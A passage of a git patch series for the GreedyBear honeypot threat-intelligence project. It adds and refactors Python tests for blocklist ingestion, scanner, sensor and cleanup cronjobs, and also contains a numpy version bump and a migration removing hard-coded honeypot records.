-        self.assertTrue(FireHolList.objects.filter(ip_address="1.2.3.4", source="blocklist_de").exists())
-
-    def test_get_or_create_returns_existing(self):
-        FireHolList.objects.create(ip_address="5.6.7.8", source="greensnow")
-
-        entry, created = self.repo.get_or_create("5.6.7.8", "greensnow")
-
-        self.assertFalse(created)
-        self.assertEqual(entry.ip_address, "5.6.7.8")
-        self.assertEqual(FireHolList.objects.filter(ip_address="5.6.7.8", source="greensnow").count(), 1)
-
-    def test_cleanup_old_entries_custom_days(self):
-        from datetime import datetime, timedelta
-
-        old_date = datetime.now() - timedelta(days=65)
-        old_entry = FireHolList.objects.create(ip_address="4.4.4.4", source="test")
-        FireHolList.objects.filter(pk=old_entry.pk).update(added=old_date)
-
-        deleted_count = self.repo.cleanup_old_entries(days=60)
-
-        self.assertEqual(deleted_count, 1)
-
-
-class TestMassScannerRepository(CustomTestCase):
-    """Tests for MassScannerRepository."""
-
-    def setUp(self):
-        self.repo = MassScannerRepository()
-
-    def test_get_or_create_creates_new_entry(self):
-        scanner, created = self.repo.get_or_create("1.2.3.4", "test scanner")
-
-        self.assertTrue(created)
-        self.assertEqual(scanner.ip_address, "1.2.3.4")
-        self.assertEqual(scanner.reason, "test scanner")
-        self.assertTrue(MassScanner.objects.filter(ip_address="1.2.3.4").exists())
-
-    def test_get_or_create_returns_existing(self):
-        MassScanner.objects.create(ip_address="5.6.7.8", reason="existing")
-
-        scanner, created = self.repo.get_or_create("5.6.7.8", "new reason")
-
-        self.assertFalse(created)
-        self.assertEqual(scanner.ip_address, "5.6.7.8")
-        # Should keep original reason, not update it
-        self.assertEqual(scanner.reason, "existing")
-        self.assertEqual(MassScanner.objects.filter(ip_address="5.6.7.8").count(), 1)
-
-    def test_get_or_create_without_reason(self):
-        scanner, created = self.repo.get_or_create("7.7.7.7")
-
-        self.assertTrue(created)
-        self.assertEqual(scanner.ip_address, "7.7.7.7")
-        self.assertEqual(scanner.reason, "")
diff --git a/tests/test_sensor_repository.py b/tests/test_sensor_repository.py
new file mode 100644
index 00000000..1220ad4a
--- /dev/null
+++ b/tests/test_sensor_repository.py
@@ -0,0 +1,58 @@
+from greedybear.cronjobs.repositories import SensorRepository
+from greedybear.models import Sensor
+
+from . import CustomTestCase
+
+
+class TestSensorRepository(CustomTestCase):
+    def setUp(self):
+        self.repo = SensorRepository()
+
+    def test_sensors_property_returns_cached_sensors(self):
+        self.repo.add_sensor("192.168.1.1")
+        self.repo.add_sensor("192.168.1.2")
+        result = self.repo.sensors
+        self.assertEqual(len(result), 2)
+        self.assertIn("192.168.1.1", result)
+        self.assertIn("192.168.1.2", result)
+
+    def test_add_sensor_creates_new_sensor(self):
+        result = self.repo.add_sensor("192.168.1.3")
+        self.assertTrue(result)
+        self.assertTrue(Sensor.objects.filter(address="192.168.1.3").exists())
+        self.assertIn("192.168.1.3", self.repo.cache)
+
+    def test_add_sensor_returns_false_for_existing_sensor(self):
+        self.repo.add_sensor("192.168.1.1")
+        result = self.repo.add_sensor("192.168.1.1")
+        self.assertFalse(result)
+        self.assertEqual(Sensor.objects.filter(address="192.168.1.1").count(), 1)
+
+    def test_add_sensor_rejects_non_ip(self):
+        result = self.repo.add_sensor("not-an-ip")
+        self.assertFalse(result)
+        self.assertFalse(Sensor.objects.filter(address="not-an-ip").exists())
+
+    def test_add_sensor_rejects_domain(self):
+        result = self.repo.add_sensor("example.com")
+        self.assertFalse(result)
+        self.assertFalse(Sensor.objects.filter(address="example.com").exists())
+
+    def test_cache_populated_on_init(self):
+        Sensor.objects.create(address="192.168.1.1")
+        Sensor.objects.create(address="192.168.1.2")
+        repo = SensorRepository()
+        self.assertEqual(len(repo.cache), 2)
+        self.assertIn("192.168.1.1", repo.cache)
+        self.assertIn("192.168.1.2", repo.cache)
+
+    def test_add_sensor_updates_cache(self):
+        initial_cache_size = len(self.repo.cache)
+        self.repo.add_sensor("192.168.1.1")
+        self.assertEqual(len(self.repo.cache), initial_cache_size + 1)
+
+    def test_add_sensor_accepts_valid_ipv4(self):
+        test_ips = ["1.2.3.4", "192.168.1.1", "10.0.0.1", "8.8.8.8"]
+        for ip in test_ips:
+            result = self.repo.add_sensor(ip)
+            self.assertTrue(result)

From 7fb5a99ab251c3a34ec187f96bcbd15ab634f462 Mon Sep 17 00:00:00 2001
From: Amisha Chhajed <136238836+amishhaa@users.noreply.github.com>
Date: Tue, 13 Jan 2026 22:12:39 +0530
Subject: [PATCH 44/75] Tests(Firehol): Adding and improving tests for Firehol.
 (#697)

* adding tests for fh

* refactor side effect method

* remove unecessary lines

* remove .return_value of get
---
 tests/greedybear/cronjobs/test_firehol.py | 143 +++++++++++++++++++---
 1 file changed, 125 insertions(+), 18 deletions(-)

diff --git a/tests/greedybear/cronjobs/test_firehol.py b/tests/greedybear/cronjobs/test_firehol.py
index bdbaefb5..b4d4a314 100644
--- a/tests/greedybear/cronjobs/test_firehol.py
+++ b/tests/greedybear/cronjobs/test_firehol.py
@@ -1,5 +1,8 @@
+from datetime import datetime, timedelta
 from unittest.mock import MagicMock, patch
 
+import requests
+
 from greedybear.cronjobs.firehol import FireHolCron
 from greedybear.models import FireHolList
 from tests import CustomTestCase
@@ -7,43 +10,35 @@
 
 class FireHolCronTestCase(CustomTestCase):
     @patch("greedybear.cronjobs.firehol.requests.get")
-    def test_run(self, mock_get):
+    def test_run_creates_all_firehol_entries(self, mock_get):
         # Setup mock responses
         mock_response_blocklist_de = MagicMock()
-        mock_response_blocklist_de.status_code = 200
         mock_response_blocklist_de.text = "# blocklist_de\n1.1.1.1\n2.2.2.2"
 
         mock_response_greensnow = MagicMock()
-        mock_response_greensnow.status_code = 200
         mock_response_greensnow.text = "# greensnow\n3.3.3.3"
 
         mock_response_bruteforceblocker = MagicMock()
-        mock_response_bruteforceblocker.status_code = 200
         mock_response_bruteforceblocker.text = "# bruteforceblocker\n1.1.1.1"
 
         mock_response_dshield = MagicMock()
-        mock_response_dshield.status_code = 200
         mock_response_dshield.text = "# dshield\n4.4.4.0/24"
 
         # Side effect for multiple calls
-        def side_effect(url, timeout):
-            if "blocklist_de" in url:
-                return mock_response_blocklist_de
-            elif "greensnow" in url:
-                return mock_response_greensnow
-            elif "bruteforceblocker" in url:
-                return mock_response_bruteforceblocker
-            elif "dshield" in url:
-                return mock_response_dshield
-            return MagicMock(status_code=404)
-
-        mock_get.side_effect = side_effect
+        mock_get.side_effect = self._firehol_get_side_effect(
+            {
+                "blocklist_de": mock_response_blocklist_de,
+                "greensnow": mock_response_greensnow,
+                "bruteforceblocker": mock_response_bruteforceblocker,
+                "dshield": mock_response_dshield,
+            }
+        )
 
         # Run the cronjob
         cronjob = FireHolCron()
         cronjob.execute()
 
-        # Check FireHolList entries were created
+        # Check that all FireHolList entries were created
         self.assertTrue(FireHolList.objects.filter(ip_address="1.1.1.1", source="blocklist_de").exists())
         self.assertTrue(FireHolList.objects.filter(ip_address="2.2.2.2", source="blocklist_de").exists())
         self.assertTrue(FireHolList.objects.filter(ip_address="3.3.3.3", source="greensnow").exists())
@@ -57,3 +52,115 @@ def side_effect(url, timeout):
         sources = list(firehol_entries.values_list("source", flat=True))
         self.assertIn("blocklist_de", sources)
         self.assertIn("bruteforceblocker", sources)
+
+    @patch("greedybear.cronjobs.firehol.requests.get")
+    def test_run_creates_some_firehol_entries(self, mock_get):
+        # Setup mock response
+        mock_response_blocklist_de = MagicMock()
+        mock_response_blocklist_de.text = "# blocklist_de\n1.1.1.1\n2.2.2.2"
+
+        mock_response_bruteforceblocker = MagicMock()
+        mock_response_bruteforceblocker.raise_for_status.side_effect = requests.exceptions.HTTPError("404 Client Error")
+
+        # Side effect for multiple calls
+        mock_get.side_effect = self._firehol_get_side_effect(
+            {
+                "blocklist_de": mock_response_blocklist_de,
+                "bruteforceblocker": mock_response_bruteforceblocker,
+            }
+        )
+
+        # Run the cronjob
+        cronjob = FireHolCron()
+        cronjob.log = MagicMock()
+        cronjob.execute()
+
+        # Check that some FireHolList entries were created
+        self.assertTrue(FireHolList.objects.filter(ip_address="1.1.1.1", source="blocklist_de").exists())
+        self.assertTrue(FireHolList.objects.filter(ip_address="2.2.2.2", source="blocklist_de").exists())
+        self.assertFalse(FireHolList.objects.filter(source="bruteforceblocker").exists())
+
+    @patch("greedybear.cronjobs.firehol.requests.get")
+    def test_run_creates_no_firehol_entries(self, mock_get):
+        # Setup mock response
+        mock_response_blocklist_de = MagicMock()
+        mock_response_blocklist_de.text = "# blocklist_de\n"
+
+        mock_response_bruteforceblocker = MagicMock()
+        mock_response_bruteforceblocker.raise_for_status.side_effect = requests.exceptions.HTTPError("404 Client Error")
+
+        # Side effect for multiple calls
+        mock_get.side_effect = self._firehol_get_side_effect(
+            {
+                "blocklist_de": mock_response_blocklist_de,
+                "bruteforceblocker": mock_response_bruteforceblocker,
+            }
+        )
+
+        # Run the cronjob
+        cronjob = FireHolCron()
+        cronjob.log = MagicMock()
+        cronjob.execute()
+
+        # Check that no FireHolList entries were created
+        self.assertFalse(FireHolList.objects.filter(source="blocklist_de").exists())
+        self.assertFalse(FireHolList.objects.filter(source="bruteforceblocker").exists())
+
+    @patch("greedybear.cronjobs.firehol.requests.get")
+    def test_run_handles_network_errors(self, mock_get):
+        # Setup mock to raise a network error
+        mock_get.side_effect = requests.exceptions.RequestException("Network error")
+
+        # Run the cronjob
+        cronjob = FireHolCron()
+        cronjob.log = MagicMock()
+        cronjob.execute()
+
+        cronjob.log.error.assert_called()
+        self.assertEqual(FireHolList.objects.count(), 0)
+
+    @patch("greedybear.cronjobs.firehol.requests.get")
+    def test_run_handles_raise_for_status_errors(self, mock_get):
+        # Setup mock to raise a 404 error
+        mock_response = MagicMock()
+        mock_response.raise_for_status.side_effect = requests.exceptions.HTTPError("404 Client Error")
+        mock_get.return_value = mock_response
+
+        # Run the cronjob
+        cronjob = FireHolCron()
+        cronjob.log = MagicMock()
+        cronjob.execute()
+
+        cronjob.log.error.assert_called()
+
+    def test_cleanup_old_entries(self):
+        now = datetime.now()
+
+        old_entry = FireHolList.objects.create(
+            ip_address="9.9.9.9",
+            source="blocklist_de",
+            added=now - timedelta(days=31),
+        )
+
+        new_entry = FireHolList.objects.create(
+            ip_address="8.8.8.8",
+            source="blocklist_de",
+            added=now - timedelta(days=10),
+        )
+
+        # Run the cronjob
+        cron = FireHolCron()
+        cron.log = MagicMock()
+        cron._cleanup_old_entries()
+
+        self.assertFalse(FireHolList.objects.filter(id=old_entry.id).exists())
+        self.assertTrue(FireHolList.objects.filter(id=new_entry.id).exists())
+
+    def _firehol_get_side_effect(self, side_effect_map):
+        def _side_effect(url, timeout):
+            for key, response in side_effect_map.items():
+                if key in url:
+                    return response
+            raise requests.exceptions.HTTPError(f"Unhandled URL: {url}")
+
+        return _side_effect

From 004d461b3d8af049b02158f878546f1f8dfe8e7d Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 15 Jan 2026 08:43:36 +0100
Subject: [PATCH 45/75] Bump numpy from 2.4.0 to 2.4.1 in /requirements (#706)

Bumps [numpy](https://github.com/numpy/numpy) from 2.4.0 to 2.4.1.
- [Release notes](https://github.com/numpy/numpy/releases)
- [Changelog](https://github.com/numpy/numpy/blob/main/doc/RELEASE_WALKTHROUGH.rst)
- [Commits](https://github.com/numpy/numpy/compare/v2.4.0...v2.4.1)

---
updated-dependencies:
- dependency-name: numpy
  dependency-version: 2.4.1
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 9c1ed53a..7b401e32 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -19,5 +19,5 @@ uwsgi==2.0.31
 joblib==1.5.3
 pandas==2.3.3
 scikit-learn==1.8.0
-numpy==2.4.0
+numpy==2.4.1
 datasketch==1.8.0

From f42b941ee9a110338f8fbf76ea8837610b8d45cb Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Thu, 15 Jan 2026 19:29:13 +0530
Subject: [PATCH 46/75] feat(tests): add comprehensive tests for cleanup.py.
 Closes #699 (#705)

* feat(tests): add comprehensive tests for cleanup.py #699

* style(tests): use exact assertion for log counts in cleanup test

* fix(tests): patch retention settings to make tests deterministic

- Mock IOC_RETENTION, COMMAND_SEQUENCE_RETENTION, and COWRIE_SESSION_RETENTION
- Use fixed values (100, 90, 80 days) to ensure tests are environment-independent
- Remove dependency on settings module imports
- Addresses reviewer feedback about environment variable brittleness

* refactor(tests): improve datetime comparison robustness

- Replace assertAlmostEqual with manual timedelta calculations
- Use assertLess for clearer error messages on failure
- Convert to CustomTestCase for proper test fixture inheritance
- Addresses Copilot feedback about assertAlmostEqual with datetime objects
---
 tests/greedybear/cronjobs/test_cleanup.py | 118 ++++++++++++++++++++++
 1 file changed, 118 insertions(+)
 create mode 100644 tests/greedybear/cronjobs/test_cleanup.py

diff --git a/tests/greedybear/cronjobs/test_cleanup.py b/tests/greedybear/cronjobs/test_cleanup.py
new file mode 100644
index 00000000..f99085b3
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_cleanup.py
@@ -0,0 +1,118 @@
+from datetime import datetime, timedelta
+from unittest.mock import MagicMock, patch
+
+from greedybear.cronjobs.cleanup import CleanUp
+from greedybear.cronjobs.repositories import CowrieSessionRepository, IocRepository
+from tests import CustomTestCase
+
+
+class TestCleanUp(CustomTestCase):
+    def test_init_uses_default_repos(self):
+        """Test that the CleanUp job initializes with default repositories if none are provided."""
+        cleanup_job = CleanUp()
+        self.assertIsNotNone(cleanup_job.ioc_repo)
+        self.assertIsNotNone(cleanup_job.cowrie_repo)
+        self.assertIsInstance(cleanup_job.ioc_repo, IocRepository)
+        self.assertIsInstance(cleanup_job.cowrie_repo, CowrieSessionRepository)
+
+    @patch("greedybear.cronjobs.cleanup.IOC_RETENTION", 100)
+    @patch("greedybear.cronjobs.cleanup.COMMAND_SEQUENCE_RETENTION", 90)
+    @patch("greedybear.cronjobs.cleanup.COWRIE_SESSION_RETENTION", 80)
+    def test_run_calls_repository_methods_with_correct_dates(self):
+        """Test that run method calls repository deletion methods with correct retention dates."""
+        # Create mock repositories
+        ioc_repo = MagicMock()
+        cowrie_repo = MagicMock()
+
+        # Setup return values for logging purposes
+        ioc_repo.delete_old_iocs.return_value = 10
+        cowrie_repo.delete_old_command_sequences.return_value = 20
+        cowrie_repo.delete_incomplete_sessions.return_value = 5
+        cowrie_repo.delete_sessions_without_login.return_value = 15
+        cowrie_repo.delete_sessions_without_commands.return_value = 8
+
+        # Initialize CleanUp with mocks
+        cleanup_job = CleanUp(ioc_repo=ioc_repo, cowrie_repo=cowrie_repo)
+
+        # Mock the logger to verify logging calls
+        cleanup_job.log = MagicMock()
+
+        # Execute the run method
+        cleanup_job.run()
+
+        # Verify interactions with IocRepository
+        ioc_repo.delete_old_iocs.assert_called_once()
+        expected_ioc_date = datetime.now() - timedelta(days=100)
+        # Check that the date passed is approximately correct (within 1 second)
+        args, _ = ioc_repo.delete_old_iocs.call_args
+        actual_date = args[0]
+        time_diff = abs((actual_date - expected_ioc_date).total_seconds())
+        self.assertLess(time_diff, 1, f"Date difference ({time_diff}s) exceeds 1 second tolerance")
+
+        # Verify interactions with CowrieSessionRepository
+
+        # 1. delete_old_command_sequences
+        cowrie_repo.delete_old_command_sequences.assert_called_once()
+        expected_cmd_date = datetime.now() - timedelta(days=90)
+        args, _ = cowrie_repo.delete_old_command_sequences.call_args
+        actual_date = args[0]
+        time_diff = abs((actual_date - expected_cmd_date).total_seconds())
+        self.assertLess(time_diff, 1, f"Date difference ({time_diff}s) exceeds 1 second tolerance")
+
+        # 2. delete_incomplete_sessions
+        cowrie_repo.delete_incomplete_sessions.assert_called_once()
+
+        # 3. delete_sessions_without_login
+        cowrie_repo.delete_sessions_without_login.assert_called_once()
+        expected_session_login_date = datetime.now() - timedelta(days=30)
+        args, _ = cowrie_repo.delete_sessions_without_login.call_args
+        actual_date = args[0]
+        time_diff = abs((actual_date - expected_session_login_date).total_seconds())
+        self.assertLess(time_diff, 1, f"Date difference ({time_diff}s) exceeds 1 second tolerance")
+
+        # 4. delete_sessions_without_commands
+        cowrie_repo.delete_sessions_without_commands.assert_called_once()
+        expected_session_cmd_date = datetime.now() - timedelta(days=80)
+        args, _ = cowrie_repo.delete_sessions_without_commands.call_args
+        actual_date = args[0]
+        time_diff = abs((actual_date - expected_session_cmd_date).total_seconds())
+        self.assertLess(time_diff, 1, f"Date difference ({time_diff}s) exceeds 1 second tolerance")
+
+        # Verify logging messages
+        # We expect 5 pairs of logs (start + result)
+        # 10 calls to info level
+        self.assertEqual(cleanup_job.log.info.call_count, 10)
+
+        # Check specific log messages to ensure counts are logged
+        cleanup_job.log.info.assert_any_call("10 objects deleted")
+        cleanup_job.log.info.assert_any_call("20 objects deleted")
+        cleanup_job.log.info.assert_any_call("5 objects deleted")
+        cleanup_job.log.info.assert_any_call("15 objects deleted")
+        cleanup_job.log.info.assert_any_call("8 objects deleted")
+
+    def test_run_handles_zero_deletions(self):
+        """Test that run method handles cases where no objects are deleted."""
+        ioc_repo = MagicMock()
+        cowrie_repo = MagicMock()
+
+        # Setup return values as 0
+        ioc_repo.delete_old_iocs.return_value = 0
+        cowrie_repo.delete_old_command_sequences.return_value = 0
+        cowrie_repo.delete_incomplete_sessions.return_value = 0
+        cowrie_repo.delete_sessions_without_login.return_value = 0
+        cowrie_repo.delete_sessions_without_commands.return_value = 0
+
+        cleanup_job = CleanUp(ioc_repo=ioc_repo, cowrie_repo=cowrie_repo)
+        cleanup_job.log = MagicMock()
+
+        cleanup_job.run()
+
+        # Verify invocations still happen
+        ioc_repo.delete_old_iocs.assert_called_once()
+        cowrie_repo.delete_old_command_sequences.assert_called_once()
+        cowrie_repo.delete_incomplete_sessions.assert_called_once()
+        cowrie_repo.delete_sessions_without_login.assert_called_once()
+        cowrie_repo.delete_sessions_without_commands.assert_called_once()
+
+        # Verify zero counts are logged
+        cleanup_job.log.info.assert_any_call("0 objects deleted")

From fc9fb6d7f5271314f5f4a1ee66bc603ade2d323b Mon Sep 17 00:00:00 2001
From: Sumit Das <codebysumitdev@gmail.com>
Date: Sun, 18 Jan 2026 15:45:12 +0530
Subject: [PATCH 47/75] Add migration to remove hard-coded honeypots. Fixes
 #632 (#717)

* Add migration to remove hard-coded honeypots. Fixes #632

* Fix migration conflict: renumber to 0029 and add dependency on 0028

---------

Co-authored-by: SUMIT DAS <sumitdas@SUMITs-MacBook-Air.local>
---
 .../0029_remove_hardcoded_honeypots.py        | 57 +++++++++++++++++++
 1 file changed, 57 insertions(+)
 create mode 100644 greedybear/migrations/0029_remove_hardcoded_honeypots.py

diff --git a/greedybear/migrations/0029_remove_hardcoded_honeypots.py b/greedybear/migrations/0029_remove_hardcoded_honeypots.py
new file mode 100644
index 00000000..1adf481b
--- /dev/null
+++ b/greedybear/migrations/0029_remove_hardcoded_honeypots.py
@@ -0,0 +1,57 @@
+# Generated by Django 5.2.10
+
+from django.db import migrations
+
+
+def remove_hardcoded_honeypots(apps, schema_editor):
+    """
+    Remove hard-coded honeypots from migration 0008 if they are not in use.
+
+    Only deletes honeypots with no associated IOC data .
+    """
+    GeneralHoneypot = apps.get_model("greedybear", "GeneralHoneypot")
+    IOC = apps.get_model("greedybear", "IOC")
+
+    # The 15 honeypots that were hard-coded in migration 0008
+    old_honeypots = [
+        "Heralding",
+        "Ciscoasa",
+        "Honeytrap",
+        "Dionaea",
+        "ConPot",
+        "Adbhoney",
+        "Tanner",
+        "CitrixHoneypot",
+        "Mailoney",
+        "Ipphoney",
+        "Ddospot",
+        "ElasticPot",
+        "Dicompot",
+        "Redishoneypot",
+        "Sentrypeer",
+        "Glutton",
+    ]
+
+    for hp_name in old_honeypots:
+        try:
+            honeypot = GeneralHoneypot.objects.get(name=hp_name)
+            # Only delete if NOT in use (no IOCs associated with this honeypot)
+            if not IOC.objects.filter(general_honeypot=honeypot).exists():
+                honeypot.delete()
+        except GeneralHoneypot.DoesNotExist:
+            # Honeypot doesn't exist, nothing to delete
+            pass
+
+
+class Migration(migrations.Migration):
+    dependencies = [
+        ("greedybear", "0027_disable_unwanted_honeypots"),
+        ("greedybear", "0028_generalhoneypot_unique_generalhoneypot_name_ci"),
+    ]
+
+    operations = [
+        migrations.RunPython(
+            remove_hardcoded_honeypots,
+            reverse_code=migrations.RunPython.noop,
+        ),
+    ]

From e72f5053e2f10ca5ef6d422ed81b456ef4610685 Mon Sep 17 00:00:00 2001
From: RAVI TEJA BHAGAVATULA <bhraviteja799@gmail.com>
Date: Mon, 19 Jan 2026 12:04:02 +0530
Subject: [PATCH 48/75] Fix #700: Standardize test base class inheritance
 (#714)

---
 .../greedybear/cronjobs/test_monitor_logs.py  |  4 +--
 tests/test_cowrie_extraction.py               |  6 ++--
 tests/test_ntfy.py                            |  6 ++--
 tests/test_rf_config.py                       |  5 ++-
 tests/test_serializers.py                     | 36 +++++++------------
 5 files changed, 23 insertions(+), 34 deletions(-)

diff --git a/tests/greedybear/cronjobs/test_monitor_logs.py b/tests/greedybear/cronjobs/test_monitor_logs.py
index 9c3052e6..ed3cff8f 100644
--- a/tests/greedybear/cronjobs/test_monitor_logs.py
+++ b/tests/greedybear/cronjobs/test_monitor_logs.py
@@ -1,11 +1,11 @@
 from datetime import datetime, timedelta
-from unittest import TestCase
 from unittest.mock import MagicMock, patch
 
 from greedybear.cronjobs.monitor_logs import MonitorLogs
+from tests import CustomTestCase
 
 
-class MonitorLogsTestCase(TestCase):
+class MonitorLogsTestCase(CustomTestCase):
     @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
     @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
     @patch("greedybear.cronjobs.monitor_logs.Path.exists")
diff --git a/tests/test_cowrie_extraction.py b/tests/test_cowrie_extraction.py
index 87e36ff3..1a9b96fe 100644
--- a/tests/test_cowrie_extraction.py
+++ b/tests/test_cowrie_extraction.py
@@ -2,7 +2,6 @@
 Tests for Cowrie extraction helper functions and strategy.
 """
 
-from unittest import TestCase
 from unittest.mock import MagicMock, Mock, patch
 
 from greedybear.cronjobs.extraction.strategies.cowrie import (
@@ -12,9 +11,10 @@
     parse_url_hostname,
 )
 from greedybear.models import CommandSequence
+from tests import ExtractionTestCase
 
 
-class TestHelperFunctions(TestCase):
+class TestHelperFunctions(ExtractionTestCase):
     """Test standalone helper functions."""
 
     def test_parse_url_hostname_valid_http(self):
@@ -75,7 +75,7 @@ def test_normalize_credential_field_clean(self):
         self.assertEqual(result, "admin")
 
 
-class TestCowrieExtractionStrategy(TestCase):
+class TestCowrieExtractionStrategy(ExtractionTestCase):
     """Test CowrieExtractionStrategy class."""
 
     def setUp(self):
diff --git a/tests/test_ntfy.py b/tests/test_ntfy.py
index de4c7c9c..f7f2dcd2 100644
--- a/tests/test_ntfy.py
+++ b/tests/test_ntfy.py
@@ -1,17 +1,17 @@
 from unittest.mock import MagicMock, patch
 
-from django.test import SimpleTestCase, override_settings
+from django.test import override_settings
 
 from greedybear.ntfy import send_ntfy_message
+from tests import CustomTestCase
 
 TEST_LOGGING = {
     "version": 1,
     "disable_existing_loggers": True,
 }
 
-
 @override_settings(LOGGING=TEST_LOGGING)
-class SendNtfyMessageTests(SimpleTestCase):
+class SendNtfyMessageTests(CustomTestCase):
     @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
     @patch("greedybear.ntfy.requests.post")
     @patch("greedybear.ntfy.logger")
diff --git a/tests/test_rf_config.py b/tests/test_rf_config.py
index 4b597a71..39be6ff2 100644
--- a/tests/test_rf_config.py
+++ b/tests/test_rf_config.py
@@ -1,12 +1,11 @@
 import json
 
-from django.test import SimpleTestCase
-
 from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
 from greedybear.settings import ML_CONFIG_FILE
+from tests import CustomTestCase
 
 
-class TestRFConfig(SimpleTestCase):
+class TestRFConfig(CustomTestCase):
     def setUp(self):
         with open(ML_CONFIG_FILE) as f:
             self.config = json.load(f)
diff --git a/tests/test_serializers.py b/tests/test_serializers.py
index 44b3beec..e7861e25 100644
--- a/tests/test_serializers.py
+++ b/tests/test_serializers.py
@@ -1,26 +1,21 @@
 import random
 from itertools import product
 
-from django.test import TestCase
 from rest_framework.serializers import ValidationError
 
 from api.serializers import FeedsRequestSerializer, FeedsResponseSerializer
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
 from greedybear.models import IOC, GeneralHoneypot
+from tests import CustomTestCase
 
 
-class FeedsRequestSerializersTestCase(TestCase):
+class FeedsRequestSerializersTestCase(CustomTestCase):
     @classmethod
-    def setUpClass(cls):
-        GeneralHoneypot.objects.create(
-            name="adbhoney",
-            active=True,
-        )
-
-    @classmethod
-    def tearDownClass(cls):
-        # db clean
-        GeneralHoneypot.objects.all().delete()
+    def setUpTestData(cls):
+        super().setUpTestData()
+        cls.adbhoney = GeneralHoneypot.objects.filter(name__iexact="adbhoney").first()
+        if not cls.adbhoney:
+            cls.adbhoney = GeneralHoneypot.objects.create(name="Adbhoney", active=True)
 
     def test_valid_fields(self):
         choices = {
@@ -92,18 +87,13 @@ def test_invalid_fields(self):
             self.assertIn("format", serializer.errors)
 
 
-class FeedsResponseSerializersTestCase(TestCase):
-    @classmethod
-    def setUpClass(cls):
-        GeneralHoneypot.objects.create(
-            name="adbhoney",
-            active=True,
-        )
-
+class FeedsResponseSerializersTestCase(CustomTestCase):
     @classmethod
-    def tearDownClass(cls):
-        # db clean
-        GeneralHoneypot.objects.all().delete()
+    def setUpTestData(cls):
+        super().setUpTestData()
+        cls.adbhoney = GeneralHoneypot.objects.filter(name__iexact="adbhoney").first()
+        if not cls.adbhoney:
+            cls.adbhoney = GeneralHoneypot.objects.create(name="Adbhoney", active=True)
 
     def test_valid_fields(self):
         scanner_choices = [True, False]

From e934f442e85bd49ddb7d36e0a6748c3d64dffbc9 Mon Sep 17 00:00:00 2001
From: Shivraj Suman <79820642+shivraj1182@users.noreply.github.com>
Date: Mon, 19 Jan 2026 12:28:28 +0530
Subject: [PATCH 49/75] feat(tests): add comprehensive tests for WhatsMyIPCron.
 Closes #708 (#716)

* feat(tests): add comprehensive tests for WhatsMyIPCron. Closes #708

* refactor: use CustomTestCase and move test to run automatically

- Changed base class from TestCase to CustomTestCase
- Removed setUp and tearDown methods (not needed with CustomTestCase)
- Moved test file from only_manual to cronjobs folder to run automatically

Addresses review feedback from @regulartim

* Update test_whatsmyip.py (replaced whatsmyip with whatsmyipdomain)

* Update test_whatsmyip.py
---
 tests/greedybear/cronjobs/test_whatsmyip.py | 136 ++++++++++++++++++++
 1 file changed, 136 insertions(+)
 create mode 100644 tests/greedybear/cronjobs/test_whatsmyip.py

diff --git a/tests/greedybear/cronjobs/test_whatsmyip.py b/tests/greedybear/cronjobs/test_whatsmyip.py
new file mode 100644
index 00000000..51586b13
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_whatsmyip.py
@@ -0,0 +1,136 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+
+from tests import CustomTestCase
+from unittest.mock import patch, MagicMock
+
+from greedybear.cronjobs import whatsmyip
+from greedybear.models import IOC, WhatsMyIPDomain
+
+
+class WhatsMyIPTestCase(CustomTestCase):
+    """Test WhatsMyIPCron cronjob"""
+
+    @patch("greedybear.cronjobs.whatsmyip.requests.get")
+    def test_add_new_domains(self, mock_get):
+        """Test adding new domains from MISP warning list"""
+        # Mock the HTTP response
+        mock_response = MagicMock()
+        mock_response.json.return_value = {
+            "list": ["test-domain-1.com", "test-domain-2.com"]
+        }
+        mock_get.return_value = mock_response
+
+        # Run the cronjob
+        cron = whatsmyip.WhatsMyIPCron()
+        cron.run()
+
+        # Verify domains were added
+        self.assertEqual(WhatsMyIPDomain.objects.count(), 2)
+        self.assertTrue(
+            WhatsMyIPDomain.objects.filter(domain="test-domain-1.com").exists()
+        )
+        self.assertTrue(
+            WhatsMyIPDomain.objects.filter(domain="test-domain-2.com").exists()
+        )
+
+    @patch("greedybear.cronjobs.whatsmyip.requests.get")
+    def test_skip_existing_domains(self, mock_get):
+        """Test that existing domains are skipped"""
+        # Add an existing domain
+        existing_domain = WhatsMyIPDomain.objects.create(domain="existing-domain.com")
+
+        # Mock the HTTP response with existing and new domains
+        mock_response = MagicMock()
+        mock_response.json.return_value = {
+            "list": ["existing-domain.com", "new-domain.com"]
+        }
+        mock_get.return_value = mock_response
+
+        # Run the cronjob
+        cron = whatsmyip.WhatsMyIPCron()
+        cron.run()
+
+        # Verify only new domain was added
+        self.assertEqual(WhatsMyIPDomain.objects.count(), 2)
+        self.assertEqual(
+            WhatsMyIPDomain.objects.get(domain="existing-domain.com").id, existing_domain.id
+        )
+        self.assertTrue(
+            WhatsMyIPDomain.objects.filter(domain="new-domain.com").exists()
+        )
+
+    @patch("greedybear.cronjobs.whatsmyip.requests.get")
+    def test_remove_old_ioc_records(self, mock_get):
+        """Test that old IOC records are cleaned up"""
+        # Create an IOC record for a domain
+        domain_name = "cleanup-domain.com"
+        ioc = IOC.objects.create(name=domain_name)
+
+        # Mock the HTTP response
+        mock_response = MagicMock()
+        mock_response.json.return_value = {"list": [domain_name]}
+        mock_get.return_value = mock_response
+
+        # Run the cronjob
+        cron = whatsmyip.WhatsMyIPCron()
+        cron.run()
+
+        # Verify IOC record was deleted
+        self.assertFalse(IOC.objects.filter(id=ioc.id).exists())
